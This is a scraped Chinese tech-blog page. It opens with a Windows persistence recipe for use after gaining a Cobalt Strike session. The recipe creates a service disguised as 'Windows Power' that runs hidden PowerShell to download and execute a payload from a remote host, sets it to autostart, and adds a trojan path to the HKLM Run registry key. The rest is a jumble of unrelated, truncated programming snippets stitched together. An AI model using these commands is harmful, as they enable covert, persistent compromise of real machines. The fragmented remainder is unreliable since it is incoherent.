技术标签: 内网渗透
前提:拿到cobalt strike的session
使用sc命令创建服务
sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1:801/a'))\""服务名可以伪装一下,binpath= 后面有个空格
将服务设置为自启动
sc config "Windows Power" start= auto设置服务的描述
sc description "Windows Power" "windows auto service"启动服务
net start "Windows Power"删除服务
sc delete "Windows Power"sc create "server power" binpath= "C:\Users\Administrator\Desktop\artifact.exe"
sc description "server power" "description" 设置服务的描述字符串
sc config "server power" start= auto 设置这个服务为自动启动
net start "server power" 启动服务 设置开机启动项,往注册表HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run添加木马程序路径
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe" /f 在用jxl 这个包读取excel的单元格的内容的时候,用如下语句:String text = cell.getContents();如果是数字,只能得到3位小数,超过的部分,会四舍五入。解决的办法就是: 1. 把单元格的格式设置为数字,并留出足够长的小数位。第一种方法虽然有效,但是显得麻烦,可以通过下面方法得到正确的数字:if(cell.getType() == CellType.NUMBER){...
<br /><br />在与 SQL Server 建立连接时出现与网络相关的或特定于实例的错误。<br />建议你看看SQL SERVER配置管理中TCP是否开启。另外命名管道是否正常。不知道你用的是哪个版本的SQL SERVER,不过大多数都是由于这些问题造成的。<br />sql2005->配置工具->外围应用配置器->服务和连接的外围应用配置器->DataBase Engine->服务->点启动<br />----------------------------->问题解决!<br />------
1.学习使用ping进行网络请求,当ping域名时可以得到对应的ip得知,域名不能带http前缀。2.之前的项目遇到一个问题,在用jsoup进行网络请求时,在调用execute或者get方法时会报connection refused的错误,经测试,请求的地址可以访问到,而通过jsoup的方式请求也是时好时坏,百度上也找不到一个所以然来,只能对代码做了如下的改进 1)将访问的域名改为ip地
目录1、CLB2、Slice2.1、SLICEM2.2、SLICEL2.3、SLICEL Vs SLICEM3、LUT4、FF5、Multiplexers5.1、MUX(4:1 )5.2、MUX(8:1 )5.3、MUX(16:1 )6、SummaryXilinx FPGA 的内部结构中最基本的构成便是 CLB 了,在更好的利用 Xilin...
在numpy库中,对于矩阵的合并操作用两种方法:行合并:np.row_stack()列合并:np.column_stack()具体操作见下面的程序:>>> import numpy as np>>> a=np.arange(16).reshape(4,-1)>>> aarray([[ 0, 1, 2, 3], ...
JDI 简介JDI(Java Debug Interface)是 JPDA 三层模块中最高层的接口,定义了调试器(Debugger)所需要的一些调试接口。基于这些接口,调试器可以及时地了解目标虚拟机的状态,例如查看目标虚拟机上有哪些类和实例等。另外,调试者还可以控制目标虚拟机的执行,例如挂起和恢复目标虚拟机上的线程,设置断点等。目前,大多数的 JDI 实现都是通过 Java 语言编写的。比...
1.在使用contentType=application/json;charset=utf-8作为HTTP 请求参数,如果使用了过滤器,并且过滤器中要读取requestBody数据,在过滤器之后,还需要通过@RequestBody注入到对应的vo上,例如: --filter public class HttpWrapperFilter extends OncePerRequestFilt...
这是最小生成树的另一种算法,要求总长度之和最短,那么先把图的路径的权值从小到大排列一下,最终连成n-1条边。按照排列好的顺序依次连线,在连线的过程中可能遇到有些点已经联通了代码:#include #include #include #include #include #include #include #include #include #include
使用Java创建指定目录下的文件(目录可能不存在)使用mkdirs递归创建目录 注意:权限问题,如果没有指定目录的权限则无法创建 /** * 创建目录以及文件 */ public static File creatFile(String filePath, String fileName) { File folder = new File(f...
Openstack Dashboard 操作指南这里我大概把我们能用到的基本操作做一个说明。使用admin账户登陆进去之后,看到的页面应该是这样。这里如果是非admin账户的话,左边就只有projet标签页,而没有admin标签页。右上角的“Settings” 可以进行一系列用户的设置,例如语言选择,更改密码等Admin标签页(管理员权限)这个标签页,只有管理员权限的用户才能...
1. 信号的本质 信号是在软件层次上对中断机制的一种模拟,是IPC机制中唯一的异步通信机制. 进程本身是无法直接处理信号的,而是必须事先将处理方式告诉内核,处理方式可以分为三种: [1]. 忽略此信号 [2]. 捕捉信号。这种方式需要用户提供一个相应的信号处理函数 [3]. 执行该信号的默认动作。默认动作主要有:忽略
与没有加深层的网络相比,加深了层的网络可以用更少的参数达到同等水平(或者更强)的表现力。我们通过结合卷积运算中的滤波器大小来理解。